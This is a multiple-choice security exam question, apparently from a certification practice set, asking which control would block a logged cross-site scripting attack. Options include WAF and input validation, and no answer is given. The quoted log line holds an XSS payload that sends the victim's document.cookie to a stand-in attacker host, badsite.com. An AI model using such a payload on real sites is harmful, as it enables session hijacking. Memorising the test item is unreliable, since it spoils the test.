A security administrator notices the following line in a server’s security log:
<input name=’credentials’ type=’TEXT’ value='” +
request.getParameter(‘><script>document.location=’http://badsite.com/?q=’document.cookie</scri pt>’) + “‘;
The administrator is concerned that it will take the developer a lot of time to fix the application that is running on the server. Which of the following should the
security administrator implement to prevent this particular attack?
A.
WAF
B.
Input validation
C.
SIEM
D.
Sandboxing
E.
DAM